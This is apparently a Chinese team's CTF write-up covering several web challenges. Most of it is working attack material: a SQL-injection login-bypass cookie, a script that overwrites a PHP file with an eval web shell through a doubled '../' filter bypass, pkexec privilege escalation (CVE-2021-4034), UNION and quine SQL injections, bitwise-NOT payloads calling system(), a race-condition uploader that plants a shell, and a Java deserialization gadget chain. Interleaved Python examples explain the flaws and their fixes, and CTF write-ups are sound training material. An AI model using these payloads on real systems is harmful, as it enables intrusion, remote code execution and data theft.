BY 恒星实验室

高手高手高高手 ()

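A scan of the site shows an exposed .git directory. Use the GitHack tool to pull down the .git folder, use git log to find the commit id, then run git reset --hard be50c81b903b0005d0740d221e74c51340251bc2 to restore the tree and obtain the source code.

The scan also finds login.php.

The footer reveals the CMS type and version number, so search online for the matching vulnerabilities.

One entry turns up saying that login.php has a SQL injection vulnerability, but it gives no PoC.
It can still be analysed from the patch the vendor released.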

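The main change to login.php is as follows:

One line was replaced: its third argument changed from a controllable value to a fixed value, and a fourth argument was added.
Follow the protect function.

Next, follow $DB->protect.

Only one thing matters for us: it puts a backslash in front of every single quote.
Follow query_single.

The key point is that it runs a query, and $where in that query is controllable, namely
'cookie_hash = '.protect($_COOKIE['navigate-user'])
A successful query redirects to the home page (equivalent to a successful login).

Tidied up, the flow is roughly as follows: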

<?php
// Simplified model of the vulnerable path: protect() only puts a backslash before '
function protect($str){
    $str = str_replace("'", '\\'."'", $str);
    $str = "'".$str."'";
    return $str;
}
$column='id';
$table='nv_users';
$str="";   // attacker-controlled value of $_COOKIE['navigate-user']
$where='cookie_hash = '.protect($str);
$order='';
$sql='SELECT ' . $column . ' FROM ' . $table . ' WHERE ' . $where . $order . ' LIMIT 1';
echo $sql;

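What remains is working out which cookie value acts as a universal password.
Because the filter adds a backslash in front of a single quote, supplying a backslash of your own escapes the one that gets added.

In other words, sending the cookie navigate-user=\'||1# logs in successfully.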
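Why quote-only escaping fails, as an added example that is not part of the original write-up or the CMS code: it models the simplified protect() above next to a version that escapes the backslash first, and scans the result the way MySQL reads a string literal with its default backslash-escape rules. The function names are hypothetical.

```python
# Added illustration: quote-only escaping versus backslash-aware escaping.
# Assumption: MySQL default mode, where a backslash escapes the next character
# inside a string literal (NO_BACKSLASH_ESCAPES is off).

def protect_quote_only(value: str) -> str:
    """Mirror of the simplified protect() above: only ' gets a backslash."""
    return "'" + value.replace("'", "\\'") + "'"


def protect_fixed(value: str) -> str:
    """Escape the backslash first, then the quote."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def literal_end(sql: str, start: int = 0) -> int:
    """Index just past the closing quote of the literal opening at sql[start].

    Returns -1 when the literal is never closed.
    """
    if sql[start] != "'":
        raise ValueError("no string literal at this position")
    i = start + 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\":            # backslash consumes the following character
            i += 2
            continue
        if ch == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2            # '' is an escaped quote
                continue
            return i + 1
        i += 1
    return -1


def sql_after_literal(escaped: str):
    """Text the database would parse as SQL after the literal.

    "" means the whole value stayed data; None means the literal was left
    open and swallows whatever follows it in the statement.
    """
    end = literal_end(escaped)
    return None if end == -1 else escaped[end:]


if __name__ == "__main__":
    # Constructed sample values; the last one is the cookie value from the text.
    for sample in ["abc", "O'Brien", "\\", "\\'||1#"]:
        weak = protect_quote_only(sample)
        fixed = protect_fixed(sample)
        print(repr(sample), "| quote-only:", weak, "->", repr(sql_after_literal(weak)),
              "| fixed:", fixed, "->", repr(sql_after_literal(fixed)))
```

Escaping by hand remains fragile across character sets and SQL modes; binding the cookie value as a query parameter removes the problem class.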

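Once inside the admin panel, search the historical vulnerabilities again; one of them caught my attention.

There is a vulnerability in navigate_upload.php, so again look at the patch.

The patch removes this entire if block, so this looks like the vulnerable spot.
The source code obtained through git does contain this block.
A brief analysis:

The uploaded file gets written, but an id must also be passed, and the path that is finally concatenated is that of an existing file.
In other words, an existing file can be overwritten.
So we can overwrite a PHP file directly. The web root has a navigate_info.php that does not seem to do much, so that is the one to overwrite.
The catch is that the id passed in is filtered: ../ is replaced with the empty string.
That is not a problem, because doubling the sequence bypasses the filter.
payload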

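#author:
import requests

sess = requests.session()
url = "http://192.168.1.116/"
# Step 1: log in through the navigate-user cookie (the value sent is \'||1#)
r1 = sess.get(url + 'login.php', headers={'Cookie': "navigate-user=\\'||1#"})
# Step 2: overwrite navigate_info.php; ....// becomes ../ once the filter has removed ../
url = url + "navigate_upload.php?session_id=31pukck2gfik0s84750cbvrdq2&engine=picnik&id=....//....//....//navigate_info.php"
files = {'file': ('1.php', '<?=eval($_POST[1]);?>', 'image/png')}
r = sess.post(url, files=files)
print(r.text)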
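The filter weakness described above, next to a containment check, as an added example that is not part of the original write-up or the CMS code. The base directory and function names are hypothetical; the first function reproduces the single-pass removal of ../, the second resolves the path and refuses anything that leaves the upload directory.

```python
# Added illustration: why deleting "../" once is not a path-traversal defence,
# and a containment check that does not depend on filtering substrings.
import posixpath

BASE_DIR = "/var/www/html/private/files"   # hypothetical storage directory


def strip_dotdot_once(user_id: str) -> str:
    """The filter described above: one non-recursive pass that deletes '../'."""
    return user_id.replace("../", "")


def resolve_inside(base_dir: str, user_id: str) -> str:
    """Join and normalise, then require the result to stay below base_dir.

    Purely lexical; on a real filesystem apply os.path.realpath to both sides
    first so symlinks cannot step outside the directory.
    """
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, user_id))
    if target == base or posixpath.commonpath([base, target]) != base:
        raise ValueError("path leaves the storage directory: %r" % user_id)
    return target


def audit(ids, base_dir=BASE_DIR):
    """For each id: (what the weak filter returns, whether the check accepts it)."""
    report = []
    for user_id in ids:
        filtered = strip_dotdot_once(user_id)
        try:
            resolve_inside(base_dir, filtered)
            accepted = True
        except ValueError:
            accepted = False
        report.append((user_id, filtered, accepted))
    return report


if __name__ == "__main__":
    # Constructed sample ids; the last is the id value used in the script above.
    for row in audit(["42", "../config.php", "....//....//....//navigate_info.php"]):
        print(row)
```

If the id is meant to be a numeric record identifier, validating it as an integer before it ever reaches a path is the stricter fix.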

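After connecting with AntSword there is no flag file, but there is an executable.

Running it does not print the flag.
Open the file and take a look.

It appears that bocai.html and bocai.png under the web root have to be deleted before running it again, but we do not have permission to delete them yet, so privilege escalation is needed.

The command find / -perm -4000 2>/dev/null shows that pkexec is present.

Escalate directly with CVE-2021-4034.

Inspection shows that bocai.html and bocai.png cannot be deleted or moved; removing that attribute with chattr -a bocai* is enough.

Run ./I_want_capture_the_flag to get the flag: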

easygo (airrudder)

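Download the attachment; it is a go.mod that contains a GitHub address.

Looking at that repository, the way to exploit it is given right there.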

payload:

http://192.168.1.115:8080/juice/1' UNION SELECT 1,flag FROM super_secret_table--+

简单包含 ()

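Submitting a PHP stream wrapper (pseudo-protocol) in the normal way shows that a WAF is in place.

After repeated testing, submitting a certain number of parameters bypasses it.
payload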

1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&flag=php://filter/convert.base64-encode/resource=flag.php

can_u_login (airrudder)

This is the same as the yet_another_mysql_injection challenge from 第五空间: it uses a SQLi quine, and the payload is the same as well:

password='UNION/**/SELECT/**/REPLACE(REPLACE('"UNION/**/SELECT/**/REPLACE(REPLACE("1",CHAR(34),CHAR(39)),CHAR(49),"1")%23',CHAR(34),CHAR(39)),CHAR(49),'"UNION/**/SELECT/**/REPLACE(REPLACE("1",CHAR(34),CHAR(39)),CHAR(49),"1")%23')%23

简单的php (airrudder)

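 <?php
show_source(__FILE__);
$code = $_GET['code'];
// Reject input longer than 80 bytes or containing letters, digits or most punctuation;
// otherwise eval it only if it consists of nested calls such as a(b(c()));
if(strlen($code) > 80 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/is',$code)){
    die(' Hello');
}else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
    @eval($code);
}
?>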

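This is clearly parameterless RCE, and letters and digits are not allowed either, so bitwise NOT (~) can be used to get around the filter:

// value for phpinfo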
?code=[~%8f%97%8f%96%91%99%90][!%FF]();

With the same technique, construct system(current(getallheaders()));

?code=[~%8c%86%8c%8b%9a%92][!%FF]([~%9c%8a%8d%8d%9a%91%8b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));
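Recovering what such a request hides, as an added example for log triage that is not part of the original write-up: each run of high bytes after ~ is flipped back (PHP's ~ on a string inverts every byte), so the function names become readable. The log lines are constructed samples that reuse the two payloads above; the function names are hypothetical.

```python
# Added illustration: decode bitwise-NOT obfuscated identifiers in request targets.
import re
from urllib.parse import unquote_to_bytes

NOT_RUN = re.compile(rb"~([\x80-\xff]+)")          # '~' followed by high bytes
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")      # looks like a function name
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')


def hidden_identifiers(request_target: str) -> dict:
    """Map parameter name -> identifiers recovered from ~<high bytes> runs."""
    query = request_target.partition("?")[2]
    found = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        raw = unquote_to_bytes(value)              # keep the bytes, no charset guess
        names = []
        for match in NOT_RUN.finditer(raw):
            text = bytes(b ^ 0xFF for b in match.group(1)).decode("latin-1")
            if IDENT.fullmatch(text):
                names.append(text)
        if names:
            found[name] = names
    return found


def scan_access_log(lines):
    """Return (line number, recovered identifiers) for every line that has any."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        decoded = hidden_identifiers(match.group(1))
        if decoded:
            hits.append((number, decoded))
    return hits


# Constructed sample log (documentation address range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2022:10:00:00 +0000] "GET /?code=hello HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2022:10:00:05 +0000] '
    '"GET /?code=[~%8f%97%8f%96%91%99%90][!%FF](); HTTP/1.1" 200 90311',
    '192.0.2.10 - - [01/Jan/2022:10:00:09 +0000] '
    '"GET /?code=[~%8c%86%8c%8b%9a%92][!%FF]([~%9c%8a%8d%8d%9a%91%8b][!%FF]'
    '([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]())); HTTP/1.1" 200 734',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```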

压缩包 ()

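The key part of the challenge is as follows:

Whatever we upload is written under /tmp and then extracted as an archive; after a series of filters, the files are deleted if they do not pass.
This opens the door to a race condition, and the path of the extracted file can be computed.
1. Compress the following PHP into a zip file.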

<?php
echo '11111';
file_put_contents('/var/www/html/x.php','<?php eval($_POST[1]);?>');
?>

2. The race-condition script is as follows

#author:
import requests
import threading
import hashlib
import base64

url = "http://192.168.1.110:8521/"
s = open('a.zip', 'rb').read()
content = base64.b64encode(s)
data = {'content': content}
# The extraction directory is computed from the upload: md5('/tmp/' + md5(content))
i = hashlib.md5(content)
md = hashlib.md5(('/tmp/' + i.hexdigest()).encode()).hexdigest()

def write(session):
    # keep uploading the archive
    while True:
        resp = session.post(url, data=data)

def read(session):
    # keep requesting the extracted a.php before it is deleted
    while True:
        resp = session.get(url + f'static/upload/{md}/a.php')
        if resp.status_code == 200:
            print('yes')

if __name__ == "__main__":
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()

Connect to x.php with AntSword, using 1 as the password.
The flag is in the root directory.
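The extract-then-check-then-delete order is what creates the window, so the added example below (not the challenge's code and not part of the original write-up) validates every archive member in memory before anything touches the disk and then extracts into an unpredictable directory. The allowed extensions, storage root and function names are assumptions.

```python
# Added illustration: check archive members before extraction instead of after.
import io
import os
import posixpath
import secrets
import zipfile

ALLOWED_EXT = {".png", ".jpg", ".txt"}   # assumption: what the app should accept


def build_zip(members: dict) -> bytes:
    """Helper that builds a constructed sample archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def rejected_members(blob: bytes) -> list:
    """Names that must not be extracted; the archive is only read from memory."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            norm = posixpath.normpath(name)
            ext = posixpath.splitext(norm)[1].lower()
            escapes = name.startswith("/") or norm == ".." or norm.startswith("../")
            if escapes or ext not in ALLOWED_EXT:
                bad.append(name)
    return bad


def safe_extract(blob: bytes, storage_root: str):
    """Extract only archives with no rejected member.

    Returns the new directory, or None when the upload is refused. The
    directory name is random rather than derived from the upload, and
    storage_root should sit outside the web root.
    """
    if rejected_members(blob):
        return None                      # nothing was written, nothing to race
    dest = os.path.join(storage_root, secrets.token_hex(16))
    os.mkdir(dest, 0o700)
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        zf.extractall(dest)
    return dest


if __name__ == "__main__":
    import tempfile
    root = tempfile.mkdtemp()
    print(safe_extract(build_zip({"a.php": "<?php echo 1; ?>"}), root))   # None
    print(safe_extract(build_zip({"img/a.png": b"\x89PNG"}), root))       # new directory
```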

easy_sql ()

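A scan of the site finds phpmyadmin.

Logging in requires a password; blindly guess root as the username.
Tried a few weak passwords.
Login succeeded with the password password, which is probably an unintended solution.

After trying the usernames one by one, logging in with the username SuperF1@g gave the flag directly.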

Ez_Java(xenny)

ysoserial without outbound network access: http://novic4.cn/index.php/archives/26.html#cl-4

import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import ysoserial.payloads.util.Reflections; // reflection helper from ysoserial, used below
import javax.management.remote.JMXServiceURL;
import javax.management.remote.rmi.RMIConnector;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

public class lab4exp {
    public static void main(String[] args) throws Exception {
        Map map = new HashMap<String, Integer>();
        // Base64 of the second-stage serialized object (the long blob is omitted here)
        String exp = "<base64-encoded serialized object omitted>";
        RMIConnector rmiConnector = new RMIConnector(new JMXServiceURL("service:jmx:rmi://localhost:9999/stub/" + exp), map);
        final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(transformer));
        queue.add(1);
        queue.add(1);
        // Swap the method name only after the queue is populated
        Reflections.setFieldValue(transformer, "iMethodName", "connect");
        final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
        queueArray[0] = rmiConnector;
        queueArray[1] = 1;
        ByteArrayOutputStream ser = new ByteArrayOutputStream();
        ObjectOutputStream oser = new ObjectOutputStream(ser);
        oser.writeObject(queue);
        oser.close();
        System.out.println(ser);
        System.out.println(Base64.getEncoder().encodeToString(ser.toByteArray()));
        // Local round trip: deserialize the object that was just produced
        new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(Base64.getEncoder().encodeToString(ser.toByteArray())))).readObject();
    }
}
